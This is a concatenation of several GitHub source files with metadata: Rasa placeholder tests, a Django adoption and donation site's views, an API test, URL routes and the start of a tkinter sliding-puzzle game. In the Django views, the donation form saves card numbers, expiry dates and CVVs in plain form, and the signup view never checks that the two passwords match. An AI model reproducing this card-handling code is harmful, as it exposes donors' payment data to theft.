Tesla and Thomas Edison\",\n ),\n (\n \"@ placeholder followed by letters should not be replaced\",\n \"hello @names and @name\",\n {\"name\": [\"Thomas Edison\"]},\n [(\"@name\", \"name\", 17)],\n \"hello @names and Thomas Edison\",\n ),\n 
],\n)\n@mock.patch.object(faker, \"Faker\")\n@pytest.mark.asyncio\nasync def test_replace_placeholders_in_text(\n faker_: mock.Mock,\n test: str,\n text: str,\n fake_data: Dict[str, List[str]],\n matches: List[Tuple[str, str, int]],\n expected: str,\n) -> None:\n for method, data in fake_data.items():\n getattr(faker_, method).side_effect = data\n importer = PlaceholderImporter()\n formatted_text = await importer.replace_placeholders_in_text(text, faker_, matches)\n assert formatted_text == expected, test\n\n\n@pytest.mark.parametrize(\n \"test, text, expected\",\n [\n (\"single curly braces\", \"hello {any}\", [(\"{any}\", \"any\", 6)]),\n (\"multiple curly braces\", \"hello {any}, {any}\", [(\"{any}\", \"any\", 6), (\"{any}\", \"any\", 13)]),\n (\"single @ placeholder\", \"hello @any\", [(\"@any\", \"any\", 6)]),\n (\"multiple @ placeholder\", \"hello @any @any\", [(\"@any\", \"any\", 6), (\"@any\", \"any\", 11)]),\n (\"mixed placeholders\", \"hello {any} @any\", [(\"{any}\", \"any\", 6), (\"@any\", \"any\", 12)]),\n (\"unknown placeholders\", \"hello {testing} @testing\", []),\n (\"existing placeholder but appended with text\", \"hello @anyhow\", []),\n (\"@ placeholders without spaces\", \"hello @any@any\", [(\"@any\", \"any\", 6), (\"@any\", \"any\", 10)]),\n (\"{} placeholder without spaces\", \"hello {any}how@any\", [(\"{any}\", \"any\", 6), (\"@any\", \"any\", 14)]),\n ],\n)\n@pytest.mark.asyncio\nasync def test_find_placeholders(test: str, text: str, expected: List[Tuple[str, str, int]]) -> None:\n importer = PlaceholderImporter()\n placeholders = [placeholder async for placeholder in importer.find_placeholders(text)]\n assert placeholders == expected, test\n\n\n@pytest.mark.parametrize(\n \"text, entities, expected\",\n [\n (\"hello world\", [], \"hello world\"),\n (\"hello world\", [{\"start\": 0, \"end\": 5, \"value\": \"hello\", \"entity\": \"GREETING\"}], \"[hello](GREETING) world\"),\n (\n \"hello world\",\n [\n {\"start\": 0, \"end\": 5, \"value\": \"hello\", \"entity\": \"GREETING\"},\n {\"start\": 6, \"end\": 11, \"value\": \"world\", \"entity\": \"LOCATION\"},\n ],\n \"[hello](GREETING) [world](LOCATION)\",\n ),\n ],\n)\n@pytest.mark.asyncio\nasync def test_rebuild_original_text(text: str, entities: List[Dict[str, Any]], expected: str) -> None:\n message = Message.build(text, \"test_intent\", entities)\n original_text = await PlaceholderImporter.rebuild_original_text(message)\n assert expected == original_text\n", "repo_name": "roniemartinez/rasam", "sub_path": "tests/importers/test_placeholder.py", "file_name": "test_placeholder.py", "file_ext": "py", "file_size_in_byte": 7688, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rasa.shared.nlu.training_data.training_data.TrainingData", "line_number": 15, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 17, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 17, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 18, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 18, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 19, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 19, "usage_type": "name"}, {"api_name": 
"unittest.mock.patch.object", "line_number": 22, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.loading", "line_number": 22, "usage_type": "argument"}, {"api_name": "unittest.mock.patch", "line_number": 22, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 22, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 27, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 34, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 36, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 36, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 37, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 37, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 38, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 38, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 13, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 70, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 76, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 79, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 80, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 80, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 46, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch.object", "line_number": 67, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 67, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 67, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 68, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 159, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 163, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 163, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 168, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 88, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 88, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch.object", "line_number": 156, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 156, "usage_type": "attribute"}, {"api_name": "unittest.mock", "line_number": 156, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 157, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 188, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 
188, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 189, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 173, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 187, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 210, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 210, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 210, "usage_type": "name"}, {"api_name": "rasa.shared.nlu.training_data.message.Message.build", "line_number": 211, "usage_type": "call"}, {"api_name": "rasa.shared.nlu.training_data.message.Message", "line_number": 211, "usage_type": "name"}, {"api_name": "rasam.PlaceholderImporter.rebuild_original_text", "line_number": 212, "usage_type": "call"}, {"api_name": "rasam.PlaceholderImporter", "line_number": 212, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 194, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 209, "usage_type": "attribute"}]}
+{"seq_id": "33581272562", "text": "from django.contrib import messages\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom .models import adoptform, partnerreg, winterdonation, donateanything, givemoney, newboarn, age_3_5y, age_6_10y, age_11_15y, age_16_18y\n#from .models import contactme\nfrom django.contrib.auth import authenticate, login\nfrom home.models import moneydonate\nfrom math import *\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import SignUpForm\n\n\ndef sign_up(request):\n    if request.method == \"POST\":\n        fm = SignUpForm(request.POST)\n        if fm.is_valid():\n            fm.save()\n    else:\n        fm = SignUpForm()\n    return render(request, 'signup.html', {'form': fm})\n\n\n# Create your views here.\ndef index(request):\n    return render(request, 'index.html')\n\n\ndef about(request):\n    return render(request, 'about.html')\n\ndef payment(request):\n    return render(request, 'paymentdone.html')\n\ndef moneyd(request):\n\n    return render(request, 'moneyd.html')\n\n'''\ndef partner(request):\n    if request.method=='POST':\n        Organization = request.POST.get('name')\n        Email = request.POST.get('email')\n        Phone = request.POST.get('phone')\n        Purpose = request.POST.get('purpose')\n        Date = request.POST.get('date')\n\n        DP=partnerreg(Organization=Organization,Email=Email,Phone=Phone,Purpose=Purpose,Date=Date)\n    return render(request, 'partner.html')\n'''\ndef handleSignUp(request):\n    if request.method==\"POST\":\n        # Get the post parameters\n        username=request.POST['username']\n        email=request.POST['email']\n        fname=request.POST['fname']\n        lname=request.POST['lname']\n        pass1=request.POST['pass1']\n        pass2=request.POST['pass2']\n\n\n        # Create the user\n        myuser = User.objects.create_user(username, email, pass1)\n        myuser.first_name= fname\n        myuser.last_name= lname\n        myuser.save()\n\n        return redirect('/')\n\n    else:\n        return render(request, 'partner.html')\n\ndef handeLogin(request):\n    if request.method==\"POST\":\n        # Get the post parameters\n        loginusername=request.POST['loginusername']\n        loginpassword=request.POST['loginpassword']\n\n        user=authenticate(username= loginusername, password= loginpassword)\n        if user is not None:\n            login(request, user)\n            messages.success(request, \"Successfully Logged In\")\n            return redirect(\"/about\")\n        else:\n            messages.error(request, \"Invalid credentials! Please try again\")\n            return redirect(\"/contact\")\n\n    return HttpResponse(\"404- Not found\")\n\ndef donationdone(request):\n\n    return render(request, 'donationdone.html')\n\ndef summerdonation(request):\n\n    return render(request, 'summer_campaign.html')\n\ndef Mdonation(request):\n    if request.method=='POST':\n        first_name = request.POST.get('name')\n        email = request.POST.get('email')\n        phone = request.POST.get('phone')\n        cardno = request.POST.get('cardno')\n        exp = request.POST.get('exp')\n        cvv = request.POST.get('cvv')\n\n        Data=moneydonate(Name=first_name,Email_Id=email,Phone=phone,Card_no=cardno,Exp=exp,Cvv=cvv)\n\n        Data.save()\n    return render(request, 'Money_Donate.html')\n\ndef winterd(request):\n    if request.method=='POST':\n        first_name = request.POST.get('name')\n        email = request.POST.get('email')\n        phone = request.POST.get('phone')\n        city = request.POST.get('city')\n        state = request.POST.get('state')\n        pin = request.POST.get('pin')\n        donatebox = request.POST.get('donatebox')\n        DW=winterdonation(Name=first_name,Email_Id=email,Phone=phone,City=city,State=state,Pin=pin,Donatebox=donatebox)\n\n        DW.save()\n    return render(request, 'winter_campaign.html')\n\n\ndef contact(request):\n    '''\n    if request.method=='POST':\n        first_name = request.POST.get('entry.961833090')\n        last_name = request.POST.get('entry.766710902')\n        email = request.POST.get('entry.626623658')\n        phone = request.POST.get('entry.1165961989')\n        message = request.POST.get('entry.1239058374')\n        DB=contactme(First_name=first_name,Last_name=last_name,Email_Id=email,Phone=phone,Message=message)\n        DB.save()\n    '''\n    return render(request, 'contact.html')\ndef donation(request):\n\n    return render(request, 'donation.html')\n\ndef money_c(request):\n    if request.method=='POST':\n        first_name = request.POST.get('name')\n        email = request.POST.get('email')\n        phone = request.POST.get('phone')\n        city = request.POST.get('city')\n        state = request.POST.get('state')\n        pin = request.POST.get('pin')\n        donatebox = request.POST.get('donatebox')\n        Dm=givemoney(Name=first_name,Email_Id=email,Phone=phone,City=city,State=state,Pin=pin,Donatebox=donatebox)\n\n        Dm.save()\n\n    return render(request, 'moneyd.html')\n\ndef one_donate(request):\n    if request.method=='POST':\n        first_name = request.POST.get('name')\n        email = request.POST.get('email')\n        phone = request.POST.get('phone')\n        city = request.POST.get('city')\n        state = request.POST.get('state')\n        pin = request.POST.get('pin')\n        donatebox = request.POST.get('donatebox')\n        D=donateanything(Name=first_name,Email_Id=email,Phone=phone,City=city,State=state,Pin=pin,Donatebox=donatebox)\n\n        D.save()\n    return render(request, 'onedonate.html')\n\n\ndef step(request):\n    return render(request, 'step_parents.html')\n\n\ndef story(request):\n    return render(request, 'story.html')\n\n\ndef child(request):\n    newboarns = newboarn.objects.all()\n    n = len(newboarns)\n    nSlides = n//4 + ceil((n/4)-(n//4))\n    params = {'no_of_slides': nSlides, 'range': range(\n        nSlides, 1), 'newboarn': newboarns}  # note: range(nSlides, 1) is always empty for nSlides >= 1\n    return render(request, 'meetchildren.html', params)\n\n\ndef adopt(request):\n    if request.method=='POST':\n        Aname=request.POST.get('Aname')\n        dob=request.POST.get('dob')\n        Gender=request.POST.get('gender')\n        Category=request.POST.get('Category')\n        id=request.POST.get('id')\n        idno=request.POST.get('idno')\n        email=request.POST.get('email')\n        phone=request.POST.get('phone')\n        martialstat=request.POST.get('martialstat')\n\n        name1=request.POST.get('name1')\n        dob1=request.POST.get('dob1')\n        gender1=request.POST.get('gender1')\n        Category1=request.POST.get('Category1')\n        id1=request.POST.get('id1')\n        idno1=request.POST.get('idno1')\n\n        email1=request.POST.get('email1')\n        phone1=request.POST.get('phone1')\n        bchild=request.POST.get('bchild')\n        achild=request.POST.get('achild')\n\n        address=request.POST.get('address')\n        district=request.POST.get('district')\n        state=request.POST.get('state')\n        pincode=request.POST.get('pincode')\n\n        address1=request.POST.get('address1')\n        district2=request.POST.get('district2')\n        state2=request.POST.get('state2')\n        pincode2=request.POST.get('pincode2')\n        D=adoptform(Applicant_Name=Aname,Date_of_Birth=dob,Gender=Gender,Category=Category,Document=id,ID_NO=idno,\n        Email_ID=email,Phone=phone,Martital_Status=martialstat,Spouse_name=name1,Spouse_DOB=dob1,Spouse_Gender=gender1,\n        Spouse_Category=Category1,Spouse_Document=id1,Spouse_ID_NO=idno1,Spouse_Email_ID=email1,Spouse_Phone=phone1,\n        Biological_children=bchild,Adopted_children=achild,Address=address,District=district,State=state,Pin_code=pincode,\n        Current_Address=address1,Current_District=district2,Current_State=state2,Current_Pin_code=pincode2)\n        D.save()\n\n\n    if request.method=='POST':\n        Email_login=request.POST.get('emaillog')\n        Password_login=request.POST.get('passlog')\n\n        user = authenticate(username=Email_login, password=Password_login)\n\n        if user is not None:\n            login(request, user)\n            Aname = user.Aname\n            # messages.success(request, \"Logged In Sucessfully!!\")\n            return render(request, \"authentication/adopt.html\",{\"Aname\":Aname})\n        else:\n            messages.error(request, \"Bad Credentials!!\")\n            return redirect('home')\n\n    return render(request, 'adopt.html')\n\n\ndef age_3_5(request):\n    age_3_5ys = age_3_5y.objects.all()\n    n = len(age_3_5ys)\n    nSlides = n//4 + ceil((n/4)-(n//4))\n    params = {'no_of_slides': nSlides, 'range': range(\n        nSlides, 1), 'age_3_5y': age_3_5ys}\n    return render(request, 'age_3_5.html', params)\n\n\ndef age_6_10(request):\n    age_6_10ys = age_6_10y.objects.all()\n\n    n = len(age_6_10ys)\n    nSlides = n//4 + ceil((n/4)-(n//4))\n    params = {'no_of_slides': nSlides, 'range': range(\n        nSlides, 1), 'age_6_10y': age_6_10ys}\n    return render(request, 'age_6_10.html', params)\n\n\ndef age_11_15(request):\n    age_11_15ys = age_11_15y.objects.all()\n\n    n = len(age_11_15ys)\n    nSlides = n//4 + ceil((n/4)-(n//4))\n    params = {'no_of_slides': nSlides, 'range': range(\n        nSlides, 1), 'age_11_15y': age_11_15ys}\n    return render(request, 'age_11_15.html', params)\n\n\ndef age_16_18(request):\n    age_16_18ys = age_16_18y.objects.all()\n\n    n = len(age_16_18ys)\n    nSlides = n//4 + ceil((n/4)-(n//4))\n    params = {'no_of_slides': nSlides, 'range': range(\n        nSlides, 1), 'age_16_18y': age_16_18ys}\n    return render(request, 'age_16_18.html', params)\n\n\ndef child_data(request, myid):\n    # fetch product by id\n    newboarns = newboarn.objects.filter(id=myid)\n    print(newboarns)\n    return render(request, 'childviewsite.html', {'newboarn': newboarns[0]})\n\n\ndef age_3_5yr(request, myid):\n    # fetch product by id\n    age_3_5ys = age_3_5y.objects.filter(id=myid)\n    print(age_3_5ys)\n    return render(request, 'age_3_5_viewsite.html', {'age_3_5y': age_3_5ys[0]})\n\n\ndef age_6_10yr(request, myid):\n    # fetch product by id\n    age_6_10ys = age_6_10y.objects.filter(id=myid)\n    print(age_6_10ys)\n    return render(request, 'age_6_10_viewsite.html', {'age_6_10y': 
age_6_10ys[0]})\n\n\ndef age_11_15yr(request, myid):\n # fetch product by id\n age_11_15ys = age_11_15y.objects.filter(id=myid)\n print(age_11_15ys)\n return render(request, 'age_11_15_viewsite.html', {'age_11_15y': age_11_15ys[0]})\n\n\ndef age_16_18yr(request, myid):\n # fetch product by id\n age_16_18ys = age_16_18y.objects.filter(id=myid)\n print(age_16_18ys)\n return render(request, 'age_16_18_viewsite.html', {'age_16_18y': age_16_18ys[0]})\n\n\n\n", "repo_name": "DestinyDoors/DestinyDoors", "sub_path": "Destiny_Doors/Second/home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 10719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "forms.SignUpForm", "line_number": 19, "usage_type": "call"}, {"api_name": "forms.SignUpForm", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 66, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 84, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages.success", "line_number": 85, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages", "line_number": 85, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 86, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages.error", "line_number": 88, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages", "line_number": 88, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponse", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "home.models.moneydonate", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 113, "usage_type": "call"}, {"api_name": "models.winterdonation", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 144, "usage_type": "call"}, {"api_name": "models.givemoney", "line_number": 155, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 159, "usage_type": "call"}, {"api_name": "models.donateanything", "line_number": 170, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 173, "usage_type": "call"}, {"api_name": 
"django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 181, "usage_type": "call"}, {"api_name": "models.newboarn.objects.all", "line_number": 185, "usage_type": "call"}, {"api_name": "models.newboarn.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.newboarn", "line_number": 185, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 192, "usage_type": "call"}, {"api_name": "models.adoptform", "line_number": 228, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 239, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 242, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 245, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages.error", "line_number": 247, "usage_type": "call"}, {"api_name": "pyexpat.errors.messages", "line_number": 247, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 248, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 250, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects.all", "line_number": 254, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects", "line_number": 254, "usage_type": "attribute"}, {"api_name": "models.age_3_5y", "line_number": 254, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 259, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects.all", "line_number": 263, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects", "line_number": 263, "usage_type": "attribute"}, {"api_name": "models.age_6_10y", "line_number": 263, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 269, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects.all", "line_number": 273, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects", "line_number": 273, "usage_type": "attribute"}, {"api_name": "models.age_11_15y", "line_number": 273, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 279, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects.all", "line_number": 283, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects", "line_number": 283, "usage_type": "attribute"}, {"api_name": "models.age_16_18y", "line_number": 283, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 289, "usage_type": "call"}, {"api_name": "models.newboarn.objects.filter", "line_number": 294, "usage_type": "call"}, {"api_name": "models.newboarn.objects", "line_number": 294, "usage_type": "attribute"}, {"api_name": "models.newboarn", "line_number": 294, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 296, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects.filter", "line_number": 301, "usage_type": "call"}, {"api_name": "models.age_3_5y.objects", "line_number": 301, "usage_type": "attribute"}, {"api_name": "models.age_3_5y", "line_number": 301, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 303, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects.filter", "line_number": 308, "usage_type": "call"}, {"api_name": "models.age_6_10y.objects", "line_number": 308, "usage_type": "attribute"}, {"api_name": "models.age_6_10y", "line_number": 308, "usage_type": "name"}, {"api_name": 
"django.shortcuts.render", "line_number": 310, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects.filter", "line_number": 315, "usage_type": "call"}, {"api_name": "models.age_11_15y.objects", "line_number": 315, "usage_type": "attribute"}, {"api_name": "models.age_11_15y", "line_number": 315, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 317, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects.filter", "line_number": 322, "usage_type": "call"}, {"api_name": "models.age_16_18y.objects", "line_number": 322, "usage_type": "attribute"}, {"api_name": "models.age_16_18y", "line_number": 322, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 324, "usage_type": "call"}]} +{"seq_id": "32711324048", "text": "from datetime import datetime\nfrom uuid import uuid4\n\n\ndef test_get_event_comment(client_valid_access_token, requests_mock):\n event_comment_uuid = uuid4()\n requests_mock.get(\n f\"http://db-api/api/event/comment/{event_comment_uuid}\",\n json={\n \"event_uuid\": str(uuid4()),\n \"value\": \"value\",\n \"insert_time\": str(datetime.now()),\n \"user\": {\n \"default_alert_queue\": {\"value\": \"queue1\", \"uuid\": str(uuid4())},\n \"default_event_queue\": {\"value\": \"queue1\", \"uuid\": str(uuid4())},\n \"display_name\": \"Analyst\",\n \"email\": \"analyst@test.com\",\n \"roles\": [],\n \"username\": \"analyst\",\n \"uuid\": str(uuid4()),\n },\n \"uuid\": str(uuid4()),\n },\n )\n\n client_valid_access_token.get(f\"/api/event/comment/{event_comment_uuid}\")\n\n assert (len(requests_mock.request_history)) == 2\n assert requests_mock.request_history[1].method == \"GET\"\n assert requests_mock.request_history[1].url == f\"http://db-api/api/event/comment/{event_comment_uuid}\"\n", "repo_name": "seanmcfeely/ace2-ams", "sub_path": "gui_api/app/tests/test_api/event_comment/test_read.py", "file_name": "test_read.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "uuid.uuid4", "line_number": 6, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 14, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 15, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "28760001784", "text": "from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom . 
import api\n\napp_name = 'labels_manager'\n\nrouter = DefaultRouter()\nrouter.register(r'labels', api.LabelAPI, basename='label')\nrouter.register(r'label_links', api.LabelLinkAPI, basename='label_link')\napi_urlpatterns = router.urls\n\nurlpatterns = [\n    path('api/', include((api_urlpatterns, app_name), namespace='api-labels')),\n    path('api/labels/bulk', api.LabelBulkUpdateAPI.as_view(), name='api-labels-bulk'),\n]\n", "repo_name": "HumanSignal/label-studio", "sub_path": "label_studio/labels_manager/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14812, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "10281565872", "text": "# -*- coding: utf-8 -*-\r\n\r\n#%% import\r\nfrom tkinter import *\r\nfrom random import *\r\nimport logging  # error handling\r\nfrom tkinter.font import *  # fonts\r\nfrom tkinter.messagebox import *  # popups\r\nimport sys  # the system module, for sys.exit()\r\nfrom time import sleep\r\nimport os\r\nimport PIL.ImageGrab  # used by screen_shot()\r\nfrom classe_taquin import *\r\nimport subprocess  # to open the index html file from python, without going through os, if the command prompt is disabled\r\n\r\ntry:  # this try is just for rayan\r\n    from fonction_recurante import *  # on the pythonpath or in the submitted folder\r\nexcept:\r\n    sys.path.append(\"C:\\\\10 rayan\\\\NSI\\\\fonction\")\r\n    from fonction_recurante import *\r\n\r\n    print('imported via sys')\r\n\r\nlogging.basicConfig(format='line=%(lineno)s %(message)s')  # for error handling\r\n\r\n# %% start of the code\r\n\r\n\r\nt = Taquin()  # the class cannot be initialized in our main\r\nt.melanger()  # because t is used inside the class\r\n\r\n\r\nclass Fenetre:\r\n    \"\"\"\r\n    This class handles the graphical interface in tkinter.\r\n    Everything that is printed is not read by the user but by the dev, so it is used to debug the game.\r\n    The taquin interface starts at the init_taquin method; the rest is just for the base interface.\r\n    \"\"\"\r\n\r\n\r\n\r\n\r\n    def __init__(self):\r\n        \"\"\"\r\n        we delegate to init by convention and for tkinter, in case it wants to self-debug with the tkinter debugger; separate inits are also more useful for debugging\r\n        \"\"\"\r\n        self.init()\r\n\r\n    def init(self):\r\n        \"\"\"\r\n        initializes our window with our colors and the resolution, as well as fullscreen and a few other things\r\n        :return:\r\n        \"\"\"\r\n        self.epi = False  # epileptic mode (easter egg)\r\n        self.root = Tk()\r\n        self.bg = \"#1e1f29\"\r\n        self.root['bg'] = self.bg\r\n        self.root.title(\"Taquin\")\r\n        self.resolution(\r\n            mode='auto')  # sets the resolution automatically based on the resolution of screen 1\r\n        self.root.attributes('-fullscreen', False)\r\n        self.top_verif = False  # if we want to use toplevels, this tells us whether they are active or not (normally not, in our case)\r\n        Button(self.root, height=0, relief=FLAT, width=0, highlightthickness=0, command=self.f_epi, bg=self.bg).place(\r\n            x=0, y=0)  # easter egg\r\n\r\n        self.bu_fermer = Button(self.root, bg='red', width=10, height=0, relief=FLAT,\r\n                                command=self.root.destroy)\r\n        self.bu_fermer.place(relx=0.988, rely=0.0001)\r\n        self.police_ttg = Font(size=30)\r\n        self.init_taquin()\r\n\r\n    def init_top(self):\r\n        \"\"\"\r\n        initializes a toplevel (this function is not necessarily used)\r\n        :return:\r\n        \"\"\"\r\n        self.top = Toplevel(self.root)\r\n        self.top['bg'] = 'white'\r\n        self.top.title(\"Top\")\r\n        self.top.geometry('1920x1080')\r\n        self.top_verif = True\r\n        full_screen(self.top)\r\n        self.bu_fermer = Button(self.top, bg='red', width=10, highlightthickness=0, height=0, relief=FLAT,\r\n                                command=self.root.destroy).place(relx=0.988, rely=0.0001)\r\n\r\n    def affichage(self, top=0):\r\n        \"\"\"\r\n        Displays the root,\r\n        or the top if desired\r\n        :param top:\r\n        :return:\r\n        \"\"\"\r\n        if top == 0:\r\n            self.root.mainloop()\r\n        else:\r\n            self.top.mainloop()\r\n\r\n    def 